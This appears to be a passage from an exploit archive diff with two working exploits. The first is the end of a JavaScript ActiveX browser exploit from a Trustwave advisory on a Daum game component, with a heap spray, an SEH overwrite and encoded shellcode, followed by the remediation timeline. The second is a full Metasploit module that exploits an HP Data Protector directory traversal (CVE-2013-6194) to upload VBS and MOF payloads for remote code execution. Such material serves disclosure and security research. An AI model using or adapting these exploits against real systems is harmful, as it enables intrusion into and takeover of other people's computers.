05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%
05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%0
5%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%90%90%eb%06%a9%15%6c%74%90%90%90%90%90%90%90%90%90%90%90%90");
var buffer = "";
for (i=0; i < 18004; i++ ){
buffer += "%41";
}
buffer = unescape(buffer);
var shellcode = "\xda\xd1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x5a\x48\x4f\x79\x33\x30\x45\x50\x35\x50\x71\x70\x6c\x49\x6b\x55\x65\x61\x4b\x62\x63\x54\x6e\x6b\x70\x52\x44\x70\x6e\x6b\x56\x32\x56\x6c\x6e\x6b\x56\x32\x34\x54\x6e\x6b\x33\x42\x74\x68\x34\x4f\x4e\x57\x32\x6a\x54\x66\x56\x51\x49\x6f\x45\x61\x49\x50\x4c\x6c\x37\x4c\x75\x31\x73\x4c\x73\x32\x76\x4c\x75\x70\x6b\x71\x5a\x6f\x76\x6d\x35\x51\x6b\x77\x38\x62\x5a\x50\x71\x42\x56\x37\x4e\x6b\x52\x72\x64\x50\x4c\x4b\x30\x42\x65\x6c\x73\x31\x6e\x30\x6c\x4b\x53\x70\x43\x48\x6e\x65\x6f\x30\x62\x54\x51\x5a\x55\x51\x4a\x70\x42\x70\x4c\x4b\x71\x58\x52\x38\x6e\x6b\x71\x48\x65\x70\x37\x71\x4e\x33\x6a\x43\x67\x4c\x71\x59\x4c\x4b\x75\x64\x4c\x4b\x57\x71\x6b\x66\x35\x61\x69\x6f\x54\x71\x4f\x30\x4e\x4c\x4b\x71\x48\x4f\x64\x4d\x47\x71\x7a\x67\x75\x68\
x59\x70\x74\x35\x79\x64\x46\x63\x71\x6d\x78\x78\x37\x4b\x51\x6d\x45\x74\x61\x65\x59\x72\x32\x78\x6c\x4b\x72\x78\x45\x74\x63\x31\x4b\x63\x30\x66\x6e\x6b\x64\x4c\x52\x6b\x6e\x6b\x52\x78\x37\x6c\x35\x51\x6e\x33\x4e\x6b\x66\x64\x6e\x6b\x37\x71\x6e\x30\x4b\x39\x77\x34\x54\x64\x75\x74\x71\x4b\x33\x6b\x71\x71\x56\x39\x61\x4a\x76\x31\x69\x6f\x6d\x30\x50\x58\x61\x4f\x32\x7a\x6c\x4b\x47\x62\x58\x6b\x4e\x66\x43\x6d\x50\x6a\x57\x71\x4e\x6d\x6e\x65\x6d\x69\x77\x70\x47\x70\x73\x30\x62\x70\x42\x48\x46\x51\x4e\x6b\x50\x6f\x6b\x37\x39\x6f\x4a\x75\x4d\x6b\x5a\x50\x38\x35\x4c\x62\x76\x36\x32\x48\x6c\x66\x4f\x65\x4d\x6d\x6f\x6d\x39\x6f\x69\x45\x55\x6c\x76\x66\x33\x4c\x76\x6a\x6d\x50\x39\x6b\x4b\x50\x52\x55\x66\x65\x6f\x4b\x53\x77\x76\x73\x63\x42\x30\x6f\x53\x5a\x65\x50\x73\x63\x79\x6f\x5a\x75\x61\x73\x33\x51\x30\x6c\x62\x43\x44\x6e\x35\x35\x61\x68\x63\x55\x43\x30\x41\x41";
var seh_code = overwrite + shellcode + buffer;
activex2.IconCreate(seh_code,'','');
</script>
</body>
</html>
<!--
Remediation Steps:
The vendor has released a fix in version 1.1.0.6
Revision History:
12/20/13 - Vulnerability disclosed to vendor
01/03/14 - Patch released by vendor
01/06/14 - Advisory published
01/07/14 - Confirmed fix
01/07/14 - Advisory revision published
References
1. http://game.daum.net/
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
________________________________
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.-->

157
platforms/windows/remote/31181.rb Executable file
View file

@ -0,0 +1,157 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Backup Client Service Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in the Hewlett-Packard Data
Protector product. The vulnerability exists at the Backup Client Service (OmniInet.exe)
when parsing packets with opcode 42. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.
},
'Author' =>
[
'Brian Gorenc', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-6194' ],
[ 'OSVDB', '101630' ],
[ 'BID', '64647' ],
[ 'ZDI', '14-003' ],
[ 'URL' , 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048, # Payload embedded into an exe
'DisableNops' => true
},
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector 6.20 build 370 / Windows 2003 SP2', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 02 2014'))
register_options([Opt::RPORT(5555)], self.class)
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 21
return Exploit::CheckCode::Vulnerable
elsif minor == 21
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Detected
end
end
def exploit
# Setup the necessary files to do the wbemexec trick
vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
exe = generate_payload_exe
vbs = Msf::Util::EXE.to_exe_vbs(exe)
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, vbs_name)
# We can't upload binary contents, so embedding the exe into a VBS.
print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...")
upload_file("windows\\system32\\#{vbs_name}", vbs)
register_file_for_cleanup(vbs_name)
print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}")
upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
end
def peer
"#{rhost}:#{rport}"
end
def build_pkt(fields)
data = "\xff\xfe" # BOM Unicode
fields.each do |v|
data << "#{Rex::Text.to_unicode(v)}\x00\x00"
data << Rex::Text.to_unicode(" ") # Separator
end
data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
return [data.length].pack("N") + data
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl
end
def upload_file(file_name, contents)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"42", # Opcode
rand_text_alpha(8), # command
rand_text_alpha(8), # rissServerName
rand_text_alpha(8), # rissServerPort
"\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
contents # Certificate contents
])
sock.put(pkt)
sock.get_once
# You cannot be confident about the response to guess if upload
# has been successful or not. While testing, different result codes,
# including also no response because of timeout due to a process
# process execution after file write on the target
disconnect
end
end